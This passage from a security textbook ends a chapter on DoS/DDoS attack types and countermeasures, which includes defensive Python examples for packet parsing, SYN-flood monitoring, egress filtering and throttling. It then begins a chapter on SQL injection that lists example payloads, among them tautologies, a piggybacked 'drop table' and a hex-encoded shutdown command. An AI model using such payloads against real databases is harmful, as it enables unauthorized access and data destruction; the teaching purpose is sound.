the deployment methods of this attack class expose the
attacker to the bare minimum. Additionally, if agents interact
through IRC networks, these channels may be used to
make changes to the current code.


9.5.2 Classification Based on Exploited Vulnerability 


Distributed Denial of Service attacks use a variety of tactics to prevent the 
target from providing service to its customers. On the basis of exploited
vulnerabilities, we distinguish between brute-force attacks and protocol
attacks [14].


• Protocol Attack: Protocol attacks take advantage of a particular
function or implementation flaw in a protocol installed on
the victim to absorb a large portion of its resources. Examples
include the CGI request attack, the TCP SYN attack, and the
authentication server attack.

• Brute-force Attacks: These attacks are carried out by launching
a large number of apparently legitimate transactions. The target
network's resources are exhausted since an originating network
can typically have more traffic bandwidth than the target
system can handle.


9.5.3 Classification Based on Rate Dynamics of Attacks 


By rate dynamics, attacks are classified into two types,
namely constant rate and variable rate attacks [15].


• Constant Rate: A constant rate function is used in the majority
of documented attacks. Agent machines produce attack
packets at a constant rate after the onset order is sent, typically
as many as their resources allow. The victim's services
are easily disrupted by the unexpected packet surge.

• Variable Rate: Variable rate attacks change an agent machine's
attack rate to delay or avoid detection and reaction.


9.5.4 Classification Based on Impact 


Based on the impact of a DDoS attack on the target, we can distinguish
between degrading and disruptive attacks [14].


• Disruptive Attack: Disruptive attacks aim to stop the target
from providing service to its customers.

• Degrading Attack: The aim of degrading attacks is to drain
a specific percentage of a target’s resources continuously.
Because these threats don’t cause complete service interruption,
they can go unrecognized for an extended period.


9.6 Transmission Control Protocol


Transmission Control Protocol (TCP) is a connection-oriented standard of
the IP suite: the communicating devices establish a connection before
transmitting data and close the connection after transmitting the
data. HTTP, HTTPS, SMTP, FTP and Telnet use TCP.


9.6.1 TCP Three-Way Handshake 


When a device needs to make a TCP/IP connection (the most popular internet
connection), it sends TCP/SYN and TCP/ACK packets of data to another
computer, typically a server.

Steps performed during TCP 3-way handshake [17]:


1. A randomized sequence number is sent by the client to the
server in a SYN (synchronize) packet.

2. The server transmits a SYN-ACK packet with a randomized
sequence number and an ACK that acknowledges the
client’s sequence number.

3. In response to the server sequence number, the client shares
the ACK number with the server.

4. Both sides use the same sequence numbers. Data will now
be sent and received independently from both parties.

Figure 9.5 TCP 3-way handshake [17].


9.7 User Datagram Protocol 


UDP is a TCP/IP data transfer protocol. Since UDP is a “stateless” protocol,
it does not acknowledge whether or not a packet has been delivered. As a
consequence, the UDP protocol is widely used in video streaming [18].


9.7.1 UDP Header 


The UDP header is a simple, fixed 64-bit header. Since each UDP port field
is 2 bytes long, the port number range is 0 to 65535, with 0 being reserved.
Various user queries or procedures are identified by port numbers.


Figure 9.6 UDP header [29]. (The figure shows an 8-byte UDP header followed
by the UDP data, with the header divided into 16-bit fields.)


• Source Port: Used to identify the source port; it is 16 bits
long.

• Destination Port: Used to identify the destination port of the
packet; it is 16 bits long.

• Length: A 2-byte field that covers the UDP header and the
data.

• Checksum: A 16-bit field.
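A parser for the four header fields listed above, as an added example that is not part of the original chapter. It also shows the two checks a receiver or sensor applies before trusting a datagram: the Length field against the bytes actually received, and the checksum computed over the IPv4 pseudo-header; the addresses, ports and payload are constructed sample values.

```python
import socket
import struct

UDP_HEADER_LEN = 8      # four 16-bit fields
IPPROTO_UDP = 17


def ones_complement_sum(data):
    """16-bit ones' complement sum used by the Internet checksum."""
    if len(data) % 2:
        data += b"\x00"                      # pad to a whole 16-bit word
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return total


def udp_checksum(src_ip, dst_ip, segment):
    """Checksum over the IPv4 pseudo-header plus the UDP header and data."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, IPPROTO_UDP, len(segment)))
    return ~ones_complement_sum(pseudo + segment) & 0xFFFF


def build_udp(src_ip, dst_ip, src_port, dst_port, payload):
    """Build a sample datagram (used here only to create test input)."""
    length = UDP_HEADER_LEN + len(payload)
    header = struct.pack("!HHHH", src_port, dst_port, length, 0)
    # A computed checksum of 0 is sent as 0xFFFF; 0 means "not computed".
    checksum = udp_checksum(src_ip, dst_ip, header + payload) or 0xFFFF
    return struct.pack("!HHHH", src_port, dst_port, length, checksum) + payload


def parse_udp(segment, src_ip=None, dst_ip=None):
    """Parse and validate a UDP datagram taken from an IPv4 packet."""
    if len(segment) < UDP_HEADER_LEN:
        raise ValueError("shorter than the 8-byte UDP header")
    src_port, dst_port, length, checksum = struct.unpack("!HHHH", segment[:8])
    if length < UDP_HEADER_LEN:
        raise ValueError("Length field is smaller than the header itself")
    if length > len(segment):
        raise ValueError("Length field exceeds the bytes received")
    datagram = segment[:length]              # ignore trailing padding
    checksum_ok = None                       # None: sender did not compute it
    if checksum != 0 and src_ip and dst_ip:
        # Summing a valid datagram together with its checksum yields zero.
        checksum_ok = udp_checksum(src_ip, dst_ip, datagram) == 0
    return {
        "src_port": src_port,
        "dst_port": dst_port,
        "length": length,
        "checksum": checksum,
        "checksum_ok": checksum_ok,
        "reserved_port": dst_port == 0,      # port 0 is reserved
        "payload": datagram[UDP_HEADER_LEN:],
    }


if __name__ == "__main__":
    sample = build_udp("192.0.2.10", "198.51.100.5", 53000, 53,
                       b"constructed payload")
    print(parse_udp(sample, "192.0.2.10", "198.51.100.5"))
```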


9.8 Types of DDoS Attacks 


DoS (Denial of Service) attacks are categorized in several ways depending on
the network and the attacker’s actions. Because of their ease, Distributed
Denial of Service (DDoS) attacks are becoming increasingly common with
hacktivists, script kiddies, and hackers. In Figure 9.7, the types of DDoS
attacks are divided by their attack characteristics. Here, the main five DDoS
attack types are explained briefly.

Figure 9.7 DDoS attacks types [5].


9.8.1 TCP SYN Flooding Attack 


TCP SYN flooding, also known as the TCP half-open attack, occurs when
a user sends a SYN packet from the host to the server in order to create
an approved TCP connection. SYN and a valid source address may be
used to establish a connection. The server responds with an ACK to the
client’s SYN packet, then waits for the client’s response before allocating
memory to that client. This wastes memory and time on the server. The
victim server will buffer connection requests until the client responds after
establishing a half-open connection. There is a timeout policy in place, and
the connection will be terminated when the timer expires. The attacker
sends SYN packet connection requests incessantly, outpacing the server's
ability to expire pending connection requests. As a result of this activity,
the 3-way handshake is affected by the DoS attack [20].

Figure 9.8 TCP SYN flood [3].
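The interaction between the handshake, the pending-connection buffer and the timeout described above, modelled from the server's side as an added example that is not part of the original chapter. The backlog size, the 3-second timeout and every address in the trace are constructed values; the counters it returns are the ones a monitoring rule would alert on.

```python
from collections import OrderedDict


class HalfOpenTracker:
    """Tracks half-open connections the way a listening server's queue does."""

    def __init__(self, backlog=8, timeout_ms=3000):
        self.backlog = backlog          # slots for pending handshakes
        self.timeout_ms = timeout_ms    # how long a SYN waits for its ACK
        self.pending = OrderedDict()    # (src, sport) -> time the SYN arrived
        self.established = 0
        self.expired = 0                # SYNs that never received an ACK
        self.dropped = []               # SYNs refused because the queue was full
        self.peak = 0

    def _expire(self, now_ms):
        # Entries are ordered by arrival, so only the oldest need checking.
        while self.pending:
            key = next(iter(self.pending))
            if now_ms - self.pending[key] < self.timeout_ms:
                break
            del self.pending[key]
            self.expired += 1

    def feed(self, now_ms, src, sport, flag):
        """Process one packet; events must arrive in time order."""
        self._expire(now_ms)
        key = (src, sport)
        if flag == "SYN":
            if key in self.pending:
                return "retransmit"
            if len(self.pending) >= self.backlog:
                self.dropped.append(key)
                return "dropped"
            self.pending[key] = now_ms
            self.peak = max(self.peak, len(self.pending))
            return "half-open"
        if flag == "ACK" and key in self.pending:
            del self.pending[key]       # step 3 of the handshake completed
            self.established += 1
            return "established"
        return "ignored"


def build_trace():
    """Constructed trace: (time in ms, source address, source port, flag)."""
    events = [(0, "192.0.2.1", 40000, "SYN"), (100, "192.0.2.1", 40000, "ACK")]
    # Thirty SYNs, 100 ms apart, from sources that never send the final ACK.
    events += [(1000 + 100 * i, "203.0.113.%d" % i, 1024 + i, "SYN")
               for i in range(30)]
    # A legitimate client tries to connect while the queue is full ...
    events += [(2550, "192.0.2.2", 40001, "SYN"), (2650, "192.0.2.2", 40001, "ACK")]
    # ... and another one after the pending entries have timed out.
    events += [(10000, "192.0.2.3", 40002, "SYN"), (10100, "192.0.2.3", 40002, "ACK")]
    return sorted(events)


def analyze(events, backlog=8, timeout_ms=3000):
    tracker = HalfOpenTracker(backlog, timeout_ms)
    for now_ms, src, sport, flag in events:
        tracker.feed(now_ms, src, sport, flag)
    return {
        "established": tracker.established,
        "expired": tracker.expired,
        "dropped": len(tracker.dropped),
        "peak_half_open": tracker.peak,
        "legitimate_client_refused": ("192.0.2.2", 40001) in tracker.dropped,
        "alert": tracker.peak >= backlog and len(tracker.dropped) > 0,
    }


if __name__ == "__main__":
    print(analyze(build_trace()))
```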


9.8.2 UDP Flooding Attack 


In UDP flooding, the attacker uses IP packets carrying UDP datagrams to target
and exploit the host’s random ports as one type of high-volume DoS attack.
During this type of attack, the hosts search for applications associated with
specific datagrams. If none are found, the host replies to the sender with
an “Unreachable Destination” packet. As a result of the flood bombardment,
the network will be overwhelmed and therefore unable to respond
to legitimate traffic [21].

Figure 9.9 UDP flood [21].


9.8.3 Smurf Attack


The Smurf attack utilizes the Internet protocol to mount a DoS assault.
It takes advantage of the Internet Control Message Protocol (ICMP)
and the IP. The ICMP protocol is used by network components and
administrators to communicate between nodes [20]. Massive groups of ICMP
packets are transmitted to a network connection across an IP relay address,
the majority of which use the target’s IP as a fake source address. Devices
on the network respond by replying to the source IP address. If the number
of devices receiving and reacting to this kind of packet on the network is
large, traffic will overpower the target’s machine [21].

Figure 9.10 Smurf attack [20].


9.8.4 Ping of Death Attack


It is a form of DoS attack where the attacker sends an IP packet larger
than the 65,536 bytes permitted by the IP protocol. One of the functions
of the TCP/IP protocol is to fragment packets into subpackets.
Attackers took advantage of this capability when they discovered that a
packet split into small packets could total more than 65,536 bytes. When
an extra-large packet is sent, several operating systems are unsure what to
do. The operating systems eventually froze, rebooted, and/or crashed as a
result [20].

Figure 9.11 Ping of death [20].


9.8.5 HTTP Flooding Attack 


An HTTP flood is a DDoS attack that is designed to overload a single
server with HTTP-GET requests. Genuine users are denied service for
their individual queries when the target has been flooded with
requests and is unable to respond to normal traffic [21].

Figure 9.12 HTTP flood attack [21].


9.9 Impact of DoS/DDoS on Various Areas


9.9.1 DoS/DDoS Attacks on VoIP Networks Using SIP 


The mechanism for transmitting speech and visual information through
Internet Protocol (IP) networks is known as Voice over IP (VoIP). Because
of their low cost and high level of support, VoIP systems are displacing
traditional solutions around the world. VoIP is anticipated to be the
leading voice service platform for fifth-generation (5G) networks.
The Session Initiation Protocol (SIP) is implemented by most VoIP networks
to conduct signaling methods. SIP is a simple text-based protocol
that can be attacked in a variety of ways. The intruder normally goes after
the SIP server to prevent consumers from utilizing VoIP resources or
to lower the efficiency of the services provided. Flooding and malformed
messages are the most common DoS attacks [22].


9.9.2 DoS/DDoS Attacks on VANET


A Vehicular Ad hoc Network (VANET) is a form of network in which vehicle
nodes can connect on the road in a multi-hop manner. VANET is concerned
with the safety of human life when people are on the road. It aims
to provide accurate data to road drivers. Because of the design of the open
wireless interface used in VANET, the VANET is vulnerable to a variety of
attacks. The attackers’ goal is to cause problems for legitimate users so
that services become unavailable, resulting in a denial of service. The
following are the possible DoS attacks [23].


• Sybil Attack.

• Node Impersonation.

• Sending False Information.

• ID Disclosure.

Figure 9.13 DOS attack in vehicle-to-infrastructure communications [23].

Figure 9.14 DOS attack in vehicle-to-vehicle communications [23].


9.9.3 DoS/DDoS Attacks on Smart Grid System 


A smart grid system is an electricity grid that incorporates several opera- 
tional and energy-saving features, such as Smart distribution boards and 
circuit breakers, advanced metering technology, solar energies, energy- 
efficient resources, and enough utility-grade optical fiber [25]. 

The following are some characteristics of the Smart Grid network 
infrastructure: 


• Traffic model.

• Communication model.

• Protocol stack.

• Timing requirement.


Because IEC 61850 is based on TCP/IP and Ethernet, IEDs in a
power station can become victims of DoS attacks such as traffic flooding
and TCP SYN attacks. Jamming attacks can also become a key security
concern as wireless devices are implemented in a substation [24].


9.9.4 DoS/DDoS Attacks in IoT-Based Devices 


The Internet of Things (IoT), which anticipates the automated connectivity
of sensors and devices while providing a variety of smart facilities, has
sparked a huge market for embedded devices. However, the computing,
storage, and networking capabilities of these IoT devices are minimal,
making them easy to exploit. Because IoT devices offer little support for
strong security mechanisms, they are easily exposed, and attackers take
advantage of this; by interfering with malicious networks they can easily
perform DoS and DDoS attacks [26].


9.10 Countermeasures to DDoS Attack


Preventing initial device compromises is the main protection against
DDoS attacks. In most cases, this entails installing patches and antivirus
applications, configuring a firewall, and keeping an eye out for intruders.
Even the most attentive hosts, though, may become targets as a result of less
equipped, less security-aware hosts. It’s hard to guard against being the
ultimate target of a DDoS attack, but it’s a lot easier to protect against being
used as a zombie or master machine.


9.10.1 Prevent Being Agent/Secondary Target 


Preventing secondary victim networks from taking part in DDoS attacks is
among the most successful ways to prevent DDoS attacks. To prevent
secondary targets from being compromised with the DDoS zombie malware,
these devices must constantly monitor their defense. They should ensure
there are no zombie programs installed on their networks, and that zombie
data traffic is not indirectly sent through the network.

Figure 9.15 Countermeasures to DDoS attack [27].


9.10.2 Detect and Neutralize Attacker


To stop attackers from performing DDoS attacks, victims need to detect 
and neutralize handlers. Examining the network protocols and collecting 
network traffic between attackers and agents or attackers and clients is 
one method for identifying network nodes that could be compromised by 
attacker malware. So, finding and shutting the handler down will neutral- 
ize the DDoS attack. 


9.10.3 Potential Threats Detection/Prevention 


Egress filtering and MIB (Management Information Base) statistics may be
used to recognize or deter a possible DDoS assault. Egress filtering is the
process of scanning IP packet headers and checking whether they meet
defined criteria. The packets are routed outside of the network from which
they originate if they meet the requirements. If anything in the packets does
not follow the requirements, they will not be sent. If the system administrator
installs a firewall in the sub-network to block any packets without a source
IP address from the sub-network, several DDoS packets with duplicate/
fake IP addresses will be discarded.
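The source-address rule described above, written out as an added example that is not part of the original chapter. The local prefixes and the outbound packets are constructed documentation addresses; only packets whose source belongs to the sub-network are forwarded, and the drop reasons are counted so they can be fed to monitoring.

```python
import ipaddress
from collections import Counter


def make_egress_filter(local_prefixes):
    """Return a function that decides whether a source address may leave."""
    nets = [ipaddress.ip_network(prefix) for prefix in local_prefixes]

    def check(src):
        try:
            addr = ipaddress.ip_address(src)
        except ValueError:
            return False, "malformed source"
        for net in nets:
            if addr.version != net.version or addr not in net:
                continue
            # The network and broadcast addresses are never valid sources.
            if (net.version == 4 and net.prefixlen < 31 and
                    addr in (net.network_address, net.broadcast_address)):
                return False, "network or broadcast address as source"
            return True, "local source"
        return False, "source outside local prefixes"

    return check


def filter_outbound(packets, local_prefixes):
    """Split outbound packets into forwarded ones and per-reason drop counts."""
    check = make_egress_filter(local_prefixes)
    forwarded, drops = [], Counter()
    for packet in packets:
        allowed, reason = check(packet["src"])
        if allowed:
            forwarded.append(packet)
        else:
            drops[reason] += 1
    return forwarded, dict(drops)


# Constructed sample: the site owns one IPv4 and one IPv6 prefix.
LOCAL_PREFIXES = ["192.0.2.0/24", "2001:db8:1::/48"]
OUTBOUND = [
    {"src": "192.0.2.17", "dst": "203.0.113.80"},      # genuine local host
    {"src": "192.0.2.200", "dst": "203.0.113.80"},     # genuine local host
    {"src": "198.51.100.9", "dst": "203.0.113.80"},    # spoofed: foreign prefix
    {"src": "10.1.2.3", "dst": "203.0.113.80"},        # spoofed: private range
    {"src": "192.0.2.255", "dst": "203.0.113.80"},     # broadcast as source
    {"src": "2001:db8:1::5", "dst": "2001:db8:ffff::1"},
    {"src": "2001:db8:2::5", "dst": "2001:db8:ffff::1"},
    {"src": "", "dst": "203.0.113.80"},                # unparsable source
]

if __name__ == "__main__":
    kept, dropped = filter_outbound(OUTBOUND, LOCAL_PREFIXES)
    print(len(kept), "forwarded;", dropped)
```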


9.10.4 DDoS Attacks and How to Avoid Them 


Load balancing is beneficial under both regular conditions and DDoS attacks.
To prevent critical links from going down in an attack, network operators may
increase bandwidth on them. Another method suggested to save the system
from shutting down is throttling. The server-centric Max-min Fair
router throttle approach configures routers that connect to a server with a
logical function that adjusts (throttles) arriving packets to server-capable
speeds. This will protect servers from flood damage.
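How a max-min fair limit divides a server's capacity among the routers in front of it, as an added example that is not part of the original chapter. It implements the general max-min fair share computation rather than the cited throttle protocol itself, and the router names, rates (packets per second) and capacity are constructed.

```python
def max_min_fair(demands, capacity):
    """Max-min fair allocation of `capacity` among the given demands.

    Routers asking for less than an equal share keep their full demand;
    what they leave unused is shared equally among the remaining routers.
    """
    if capacity < 0 or any(d < 0 for d in demands.values()):
        raise ValueError("rates must be non-negative")
    allocation = {}
    remaining = float(capacity)
    pending = sorted(demands, key=demands.get)       # smallest demand first
    while pending:
        share = remaining / len(pending)
        router = pending[0]
        if demands[router] <= share:
            allocation[router] = float(demands[router])
            remaining -= demands[router]
            pending.pop(0)
        else:
            # Every router still pending wants more than the equal share.
            for name in pending:
                allocation[name] = share
            break
    return allocation


def throttle_report(demands, capacity):
    """Per-router offered, forwarded and dropped rates under the throttle."""
    allocation = max_min_fair(demands, capacity)
    return {
        name: {
            "offered": demands[name],
            "forwarded": allocation[name],
            "dropped": demands[name] - allocation[name],
        }
        for name in demands
    }


# Constructed scenario: r3 and r4 carry flood traffic, r1 and r2 do not.
DEMANDS = {"r1": 10, "r2": 20, "r3": 300, "r4": 500}
SERVER_CAPACITY = 200

if __name__ == "__main__":
    for name, row in throttle_report(DEMANDS, SERVER_CAPACITY).items():
        print(name, row)
```

The routers carrying ordinary traffic are forwarded in full, while the two flooding paths are cut to the same limit, so the total arriving at the server equals its capacity.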


9.10.5 Deflect Attack 


Honeypots are networks that are knowingly set up for low security to catch 
an attacker. Honeypots are used to prevent threats from reaching the net- 
works they are defending, as well as to gather intelligence about threats by 
recording their actions and discovering what types of attacks and technical 
techniques they are using. By tracking the attacker, we get to know about 
the attacker and can defend against him in the future. 


9.10.6 Post-Attack Forensics


If data on traffic patterns is collected throughout a DDoS attack, it could 
be studied afterward to check for unique features in that malicious attack. 
This feature information could be utilized to improve the reliability and 
security capacity of load balancing and throttling countermeasures by 
upgrading them. Packet traceback methods are recommended to aid in 
the identification of the perpetrators. The idea is to follow Internet traffic 
back to its origin. This method aids in the detection of the intruder and the 
network operator can discover what kind of DDoS attack it is [27]. 


9.11 Conclusion 


In this chapter, it’s concluded that Denial of Service (DoS) and Distributed 
Denial of Service (DDoS) are effective attacks that cause huge resource 
and financial losses. There are several tools available on the Internet 
which make it easy for an attacker to target a zombie/agent or a DoS vic- 
tim. A DoS attack disturbs the whole flow of computer traffic by transfer- 
ring a huge amount of data packets and requests to the victim machine. 
Due to the rapid development of technologies, the number of Internet 
users who fear DoS attacks is rapidly growing. Data gathered by Arbor
Networks shows that the frequency of attacks is gradually increasing year
by year. The timeline shows that these attacks are carried out mainly 
to disturb popular companies such as GitHub, Amazon, CNN, Airbnb, 
Spotify, PayPal, Netflix, Visa, The New York Times, Reddit, and many 
others to exploit their resources, to degrade the services to the client, etc. 
To be safe from these DoS and DDoS attacks every person on the Internet 
should take some countermeasures like preventing being an agent, try- 
ing to detect and neutralize attackers, using deflection techniques to 
deflect attacks, etc. Due to DoS attacks on IoT systems, a Software- 
Defined Networking (SDN) protection approach can be used to identify 
and minimize DoS and DDoS attacks using the principle of entropy as 
the detection mechanism [26]. Various studies suggested routing pro- 
tocols to boost the stability of multi-hop networks against DoS attacks. 
Specifically, in the context of mobile ad hoc networks (MANETs), the 
logical topology changes over time using routing protocols which help to 
avoid such DoS attacks [30]. 


9.12 Future Scope


Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks
cannot be completely stopped due to lack of expertise and proper defense
mechanisms; these attacks are not stopping soon. DoS attacks on
network-based devices are a frequent phenomenon in cloud services, but they
can be mitigated by introducing third-party checkpoint access [20]. Since
the speed and bandwidth of 5G are much higher than those of the previous
generation, companies will be transitioning to VoIP systems worldwide, and
the vulnerability in the SIP method used in VoIP gives freedom to attackers
to carry out DoS attacks [22]. As part of the ongoing research on detecting
DoS and DDoS attacks, a Network Function has been developed which
can be implemented as a dedicated module in the network. This will
give the identification mechanism more versatility to align with other 5G
system foundations like NFV [26]. In the near future, plenty of control
systems are planned to adopt wireless technology, which increases the threat
of frequent DoS attacks, so more cyber professionals need to do important
research in this field [30].


References 


1. Ormiston, Kathryn & Eloff, Mm. (2006). Denial-of-Service & Distributed
Denial-of-Service on The Internet. 1-14.

2. Abliz, M., 2011. Internet denial of service attacks and defense
mechanisms, [online] Available at:
<https://blog.oureducation.in/wp-content/uploads/2014/06/Internet-Deniel.pdf>.

3. Ali, Murad M., 2006. Intrusion Detection, Denial of Service (DoS). [ebook]
New York: New York Institute of Technology (NYIT), Amman’s campus.
Available at:
<https://www.just.edu.jo/~tawalbeh/nyit/incs745/presentations/DoS.pdf>.

4. Help Net Security. 2021. For enterprises, malware is the most expensive type
of attack - Help Net Security. [online] Available at:
<https://www.helpnetsecurity.com/2019/03/07/cyberattack-cost-2018/>.

5. Mahjabin, T., Xiao, Y., Sun, G. and Jiang, W., 2017. A survey of distributed
denial-of-service attack, prevention, and mitigation techniques. International
Journal of Distributed Sensor Networks, 13(12), p.155014771774146.

6. Cybercrime Magazine. 2021. The 15 Top DDoS Statistics You Should
Know in 2020. [online] Available at:
<https://cybersecurityventures.com/the-15-top-ddos-statistics-you-should-know-in-2020/>.

7. Us.norton.com. 2021. What Are Denial of Service (DoS) Attacks?
DoS Attacks Explained. [online] Available at:
<https://us.norton.com/internetsecurity-emerging-threats-dos-attacks-explained.html#:~:text=A%20bit%20of%20history%3A%20The,research%20lab%20to%20power%20off.>.

8. En.wikipedia.org. 2021. Denial-of-service attack. [online] Available at:
<https://en.wikipedia.org/wiki/Denial-of-service_attack>.

9. Cs.columbia.edu. 2021. [online] Available at:
<https://www.cs.columbia.edu/~smb/classes/f06/122.pdf>.

10. Us.norton.com. 2021. What is a DDoS attack? [online] Available at:
<https://us.norton.com/internetsecurity-emerging-threats-what-is-a-ddos-attack-30sectech-by-norton.html>.

11. Tools.cisco.com. 2021. What Is the Difference: Viruses, Worms, Trojans,
and Bots? [online] Available at:
<https://tools.cisco.com/security/center/resources/virus_differences#dos_attacks>.

12. www.kaspersky.com. 2021. What is a Trojan Virus? [online] Available at:
<https://www.kaspersky.com/resource-center/threats/trojans>.

13. Gu, Q & Liu, P 2012, Denial of Service Attacks. In Handbook of
Computer Networks. vol. 3, John Wiley and Sons, pp. 454-468.
https://doi.org/10.1002/9781118256107.ch29

14. Mirkovic, Jelena, Martin, Janice & Reiher, Peter. (2003). A Taxonomy of
DDoS Attacks and DDoS Defense Mechanisms.

15. Mirkovic, J. and Reiher, P., 2004. A taxonomy of DDoS attack and DDoS
defense mechanisms. ACM SIGCOMM Computer Communication Review,
34(2), pp.39-53.

16. Mishra, Anjana & Ghosh, Soumitra & Mishra, Brojo. (2019). Cybersecurity:
A Practical Strategy Against Cyber Threats, Risks with Real World Usages.
10.1002/9781119488330.ch13.

17. Hsu, F., Hwang, Y., Tsai, C., Cai, W., Lee, C. and Chang, K., 2016. TRAP: A
Three-Way Handshake Server for TCP Connection Establishment. Applied
Sciences, 6(11), p.358.

18. Techterms.com. 2021. UDP (User Datagram Protocol) Definition. [online]
Available at: <https://techterms.com/definition/udp>.

19. Mishra, Anjana & Bisoy, Sukant. (2018). Understanding the Aspect of
Cryptography and Internet Security: A Practical Approach.

20. Gunasekhar, T., Rao, K., Saikiran, P. and Lakshmi, P., 2014. A Survey on
Denial of Service Attacks. International Journal of Computer Science and
Information Technologies, [online] 5 (2). Available at:
<http://ijcsit.com/docs/Volume%205/vol5issue02/ijcsit20140502320.pdf>.

21. Arshi, M., Nasreen, M. and Madhavi, K., 2020. A Survey of DDOS Attacks
Using Machine Learning Techniques. E3S Web of Conferences, 184, p.01052.

22. Nazih, W., Elkilani, W., Dhahri, H. and Abdelkader, T., 2020. Survey of
Countering DoS/DDoS Attacks on SIP Based VoIP Networks. Electronics,
9(11), p.1827.

23. Hasbullah, Halabi & Soomro, Irshad & Ab Manan, Jamalul-Lail. (2010).
Denial of service (DOS) attack and its possible solutions in VANET. 65.

24. Chourasia, A. and Chourasia, A., 2017. An analysis and review against
Denial of service attack for smart grid system. International Research Journal
of Engineering and Technology (IRJET), [online] 04(05). Available at:
<https://www.irjet.net/archives/V4/i5/IRJET-V415366.pdf>.

25. En.wikipedia.org. 2021. Smart grid. [online] Available at:
<https://en.wikipedia.org/wiki/Smart_grid>.

26. Galeano-Brajones, J., Carmona-Murillo, J., Valenzuela-Valdés, J. and
Luna-Valero, F., 2020. Detection and Mitigation of DoS and DDoS Attacks in
IoT-Based Stateful SDN: An Experimental Approach. Sensors, 20(3), p.816.

27. Stephen M. Specht and Ruby B. Lee, Distributed Denial of Service:
Taxonomies of Attacks, Tools, and Countermeasures. Proceedings of the 17th
International Conference on Parallel and Distributed Computing Systems, 2004
International Workshop on Security in Parallel and Distributed Systems, pp.
543-550.

28. Prakash, A. & Murali, Satish & Bhargav, T. & Natarajan, Bhalaji. (2016).
Detection and Mitigation of Denial of Service Attacks Using Stratified
Architecture. Procedia Computer Science. 87. 275-280.
10.1016/j.procs.2016.05.161.

29. Kamil, Wisam & Awang Nor, Shahrudin & Alubady, Raaid. Research Article
Performance Evaluation of TCP, UDP and DCCP Traffic Over 4G Network.
Research Journal of Applied Sciences, Engineering and Technology. 11.
1048-1057, 2015. 10.19026/rjaset.11.2118.

30. Cetinkaya, A., Ishii, H. & Hayakawa, T., 2019. An Overview on
Denial-of-Service Attacks in Control Systems: Attack Models and Security
Analyses. Entropy, 21(2), p. 210. Available at:
http://dx.doi.org/10.3390/e21020210.


10 
SQL Injection Attack on Database System 


Mohit Kumar 


NSUT East Campus Formerly Ambedkar Institute of Advanced Communication 
Technologies and Research, Delhi, India 


Abstract 

In recent years database security is very much needed to defend against differ- 
ent attacks. In this chapter we will discuss the practical implementation of the 
SQL injection attack by using the MySQL database server in which we understand 
how an attacker can compromise the database security by using the SQL injection 
statements embedded with the normal SQL queries. This chapter also discusses 
the detection and prevention mechanism from the SQL injection attack and how 
to protect our database from this type of attack and also gives a better understand- 
ing of the SQL injection statements. 


Keywords: SQL injection, SQL injection vulnerability 


10.1 Introduction 


SQL injection is a type of attack in which an attacker exploits a web
security vulnerability through the SQL queries that a particular application
makes to its database. It can allow the attacker to view data in an
unauthorized manner, such as users’ data or any data that the application
itself is able to access. In this attack an attacker can also modify and
delete data in the database. If the SQL injection attack is successful it can
lead to the following [2, 6]:

• Unauthorized access to sensitive data.
• Backdoor entry in the database system.
• Modification and deletion of sensitive data.


Examples of SQL injection attacks:


• Retrieving hidden data

• UNION attacks

• Blind SQL injection

• Subverting application logic


There are two main reasons why SQL injection remains a problem,
which are as follows:


• Some web developers are not aware of the SQL injection
attack, which can make the website vulnerable.

• Even if we provide security in our network, hackers keep looking
for new attacks on that system, and new vulnerabilities are
also found in the system.


With the advent of mobile phones, smartphones, tablets, etc., which
run on Android-based, Java-based and iOS-based operating systems, a
large amount of the data on those devices is stored in a database
called the SQLite database. As it is the database used to
store handheld device information, it is also vulnerable to SQL injection
attack. So, it is important to understand that web applications, mobile
applications, desktop applications and those devices which are connected
to the database are also targets of the SQL injection attack, and
that the attack can also steal the personal information of the user and use
it for personal purposes as well [3].

In this chapter we are going to implement the SQL injection attack by 
using SQL injection statements with the SQL queries on the MySQL data- 
base server and understand the working of the SQL injection attack and 
also understand how an attacker implements the SQL injection attack with 
the SQL statements. This chapter also provides knowledge about the detec- 
tion and prevention countermeasures of the SQL injection and provides 
the proper security to our information system. 


10.1.1 Types of Vulnerabilities 


Types of vulnerabilities in SQL injection are as follows [1, 3]:

• Type 1 Vulnerability: In this type of vulnerability, we can check the suspicious input for malicious activity in the website with the help of the input validation. Suspicious input may permit a malicious code to be executed many times without proper and exact verification on the original intention.

• Type 2 Vulnerability: In this type of vulnerability, there is the difficulty in the characterization in the different data types which we used in the programming language for the web development.

• Type 3 Vulnerability: In this type of vulnerability, any process delay in the analysis stage till the runtime stage as the present variables are measured despite the source code using an expression to achieve the attack.

• Type 4 Vulnerability: In this type of vulnerability, there is improper definition of the datatype while designing.


10.1.2 Types of SQL Injection Attack 


Different types of SQL injection attacks are as follows [1, 2, 7]:

• Tautology: Bypassing authentication and extracting data, in which an attacker injects code into one or more conditional statements.
Example: Select * from student where std_id='' or '6=6';

• Logically incorrect queries: Extracting information from the database, identifying the injectable patterns, and performing database fingerprinting.
Example: Select accounts from student where login='' AND pass='';

• Union Query: Bypassing authentication and extracting data, in which an attacker exploits the vulnerable parameter to change the data set by using the union operator.
Example: Select * from student where std_name='abe union select * from academic where id='421' 'pass='2=2';

• Stored Procedure: Using the built-in procedures to perform a malicious action in the database.
Example: Select accounts from student where login= 'abc AND pass=''; SHUTDOWN;


• Piggybacking queries: Appending the malicious query to the legitimate query in the database.
Example: Select * from emp where name= 'abc'; drop table emp;

• Inference: It can enable the attacker to change the behavior of the application or database.

• Alternate Encodings: In this attack, an intruder can modify the injection query by using an alternate encoding, such as hexadecimal, ASCII, and Unicode.
Example: Select accounts from student where login= '' AND pin=0; exec (char(0x73687574646f776e)).


10.1.3 Impact of SQL Injection Attack

There are various impacts of SQL injection attacks, which are given below [3, 5]:


• Impact to Confidentiality: Attacker can steal the sensitive information such as user credentials, organization secrets.

• Impact to Integrity: Attacker can update, delete, and insert the malicious data in the database, which can make the database vulnerable.

• Impact to Authentication and Authorization: Attacker can take unauthorized access of the data in the database by stealing the authorized user credential.


10.2 Objective and Motivation


My objective and motivation for the chapter on SQL injection attacks are 
as follows: 


• To give better understanding of how we can implement the SQL injection attack by using MySQL database server and SQL queries.

• This chapter provides countermeasures information regarding the SQL injection attack.

• This chapter provides information regarding the different types of SQL injection statements.

